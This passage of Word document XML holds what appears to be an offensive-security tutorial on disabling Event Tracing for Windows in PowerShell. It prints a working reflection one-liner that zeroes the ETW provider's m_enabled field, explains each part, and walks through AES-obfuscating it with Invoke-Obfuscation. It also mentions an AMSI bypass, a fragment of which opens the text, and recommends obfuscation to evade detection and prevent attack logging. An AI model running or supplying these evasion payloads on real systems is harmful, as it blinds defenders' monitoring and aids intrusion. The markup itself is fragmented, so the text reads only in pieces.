                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(('{0}{1}{2}' -f $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n,$b,$k</w:t>
            </w:r>
            <w:proofErr w:type="spell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NonPublic,Static</w:t>
            </w:r>
            <w:proofErr w:type="spell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field.SetValue</w:t>
            </w:r>
            <w:proofErr w:type="spell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null,$true</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ADD8E6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Patching Event Tracing for Windows</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Event Tracing for Windows (ETW) is a powerful logging and tracing mechanism in the Windows operating system that allows developers, administrators, and analysts to monitor and diagnose system events in real time. It collects and analyses diagnostic and performance data from applications and services running on Windows. ETW records events generated by the operating system and applications, including information on processes, threads, disk I/O, network activity, and more.</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By disabling or manipulating ETW, attackers can prevent security tools from logging their actions or tracking their movement within a system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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Original Payload to patch ETW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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Understanding the command</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This command is used to modify the behavior of the Event Tracing for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ETW) in PowerShell. Specifically, it sets a private, static field within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System.Management.Automation.Tracing.PSEtwLogProvider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> class called </w:t>
      </w:r>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m_enabled</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to true, </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicates that the initialization of ETW is disabled.</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Here is a breakdown of the command and what each part does:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Reflection.Assembly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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LoadWithPartialName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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System.Core</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loads the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Core</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> assembly into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Diagnostics.Eventing.EventProvider</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retrieves the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EventProvider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> type from the loaded assembly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'m_enabled','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NonPublic,Instance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> retrieves the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>m_enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> field of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EventProvider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> type, which determines whether event tracing is enabled for that provider.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SetValue(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>m_enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> field of the PowerShell ETW provider to </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (disabled). This prevents PowerShell from logging events to the Windows Event Log or other ETW consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Patching ETW</w:t>
      </w:r>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We have already learned how to patch PowerShell scripts manually. I will explain how to obfuscate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-Obfuscation</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this example. I already have this setup on my Commando-VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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First thing is that we can launch </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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We can set our payload and use AES encryption to encrypt our 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5600C" w:rsidRPr="0055600C" w:rsidTr="0055600C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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5600C" w:rsidRPr="0055600C" w:rsidTr="0055600C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>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Invoke-Obfuscation&gt; SET SCRIPT BLOCK [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)</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Invoke-Obfuscation&gt; ENCODING</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="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55600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Invoke-Obfuscation&gt; ENCODING\5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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The encrypted payload will be visible at the end of the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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Now we can execute the payload. Before doing that, we need to understand why we have encrypted the payload and what the payload does. First, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly execute the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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As we can see that Defender has detected our encrypted payload, this is because it’s encryption which will be decrypted and get executed. Hence will help in bypassing Static analysis only. We can better understand if we execute the command without executing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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To circumvent this security measure, we can bypass AMSI and then execute the desired command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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 xml:space="preserve">It’s worth noting that while we can bypass AMSI and execute the raw payload to disable ETW, doing so may result in detecting and logging the attack in the PowerShell history </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>file. As a result, it is recommended to use additional techniques such as encoding or obfuscation to evade detection and prevent attack logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ADD8E6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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 w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>AmsiTrigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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 w:history="1">
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Invoke-obfuscation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you find my articles interesting, you can buy me a coffee</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D6491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF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407C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AC6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E66C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8ACB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E61B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3152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B7B4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5452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F1300"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="134C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73D1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E94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96EAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E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94F01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59C2B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B265C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DDE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937C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F6C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82D32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4838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A5DCD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7048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1D63D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB3C6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D568B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD400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8F4ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85A0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A60528"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E72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E43ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DB4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0478A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BF4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95DEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B46E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15054"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E268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406582"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9B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5812CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6768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17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
